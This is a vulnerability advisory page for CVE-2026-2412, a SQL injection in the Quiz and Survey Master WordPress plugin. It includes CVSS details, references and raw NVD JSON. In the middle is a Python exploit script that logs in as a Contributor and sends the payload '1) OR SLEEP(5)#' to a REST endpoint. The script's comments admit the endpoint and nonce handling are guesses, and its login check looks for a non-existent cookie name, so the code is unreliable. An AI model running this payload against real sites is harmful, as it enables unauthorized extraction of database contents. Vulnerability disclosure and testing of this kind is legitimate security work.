CVE-2026-2412

Description

The Quiz and Survey Master (QSM) plugin for WordPress is vulnerable to SQL Injection via the 'merged_question' parameter in all versions up to, and including, 10.3.5. This is due to insufficient sanitization of user-supplied input before being used in a SQL query. The sanitize_text_field() function applied to the merged_question parameter does not prevent SQL metacharacters like ), OR, AND, and # from being included in the value, which is then directly concatenated into a SQL IN() clause without using $wpdb->prepare() or casting values to integers. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Quiz and Survey Master (QSM) <= 10.3.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-2412: Authenticated SQL Injection in QSM Plugin

import requests
import sys

def exploit(url, username, password):
    session = requests.Session()
    
    # 1. Login as Contributor (Low privilege user)
    login_url = f"{url}/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "redirect_to": f"{url}/wp-admin/",
        "testcookie": "1"
    }
    print(f"[*] Logging in as {username}...")
    session.post(login_url, data=login_data)
    
    # Check if login successful
    if 'wp-admin' not in session.cookies.get_dict():
        print("[-] Login failed.")
        return

    # 2. Send Payload to vulnerable endpoint
    # The vulnerability is in the 'merged_question' parameter
    # Payload: 1) OR SLEEP(5)# to test for time-based blind injection
    target_endpoint = f"{url}/wp-json/qsm/v1/questions/merge" # Endpoint might vary based on plugin version
    
    payload = "1) OR SLEEP(5)#"
    
    headers = {
        "Content-Type": "application/json",
        "X-WP-Nonce": "" # Nonce might be required depending on REST API config
    }
    
    # Fetch nonce if necessary (omitted for brevity, assuming REST API is accessible)
    data = {
        "merged_question": payload
    }

    print(f"[*] Sending payload to {target_endpoint}")
    try:
        response = session.post(target_endpoint, json=data, headers=headers, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! Response delayed by 5 seconds.")
        else:
            print("[-] Vulnerability not triggered or patched.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <url> <username> <password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2412
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2412
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2412/
[4] VulDB https://vuldb.com/cve/CVE-2026-2412
[5] https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/classes/class-qsm-questions.php#L387
[6] https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/rest-api.php#L760
[7] https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/classes/class-qsm-questions.php
[8] https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/rest-api.php
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/b32bf1cb-3722-41fc-be51-dabe80416b14?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2412", "sourceIdentifier": "[email protected]", "published": "2026-03-23T23:17:11.287", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quiz and Survey Master (QSM) plugin for WordPress is vulnerable to SQL Injection via the 'merged_question' parameter in all versions up to, and including, 10.3.5. This is due to insufficient sanitization of user-supplied input before being used in a SQL query. The sanitize_text_field() function applied to the merged_question parameter does not prevent SQL metacharacters like ), OR, AND, and # from being included in the value, which is then directly concatenated into a SQL IN() clause without using $wpdb->prepare() or casting values to integers. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin Quiz and Survey Master (QSM) para WordPress es vulnerable a inyección SQL a través del parámetro 'merged_question' en todas las versiones hasta la 10.3.5, inclusive. Esto se debe a una sanitización insuficiente de la entrada proporcionada por el usuario antes de ser utilizada en una consulta SQL. La función sanitize_text_field() aplicada al parámetro merged_question no evita que metacaracteres SQL como ), OR, AND y # se incluyan en el valor, el cual es luego concatenado directamente en una cláusula SQL IN() sin usar $wpdb->prepare() ni convertir valores a enteros. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, añadan consultas SQL adicionales en consultas ya existentes que pueden ser utilizadas para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/classes/class-qsm-questions.php#L387", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/rest-api.php#L760", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/classes/class-qsm-questions.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/rest-api.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b32bf1cb-3722-41fc-be51-dabe80416b14?source=cve", "source": "[email protected]"}]}}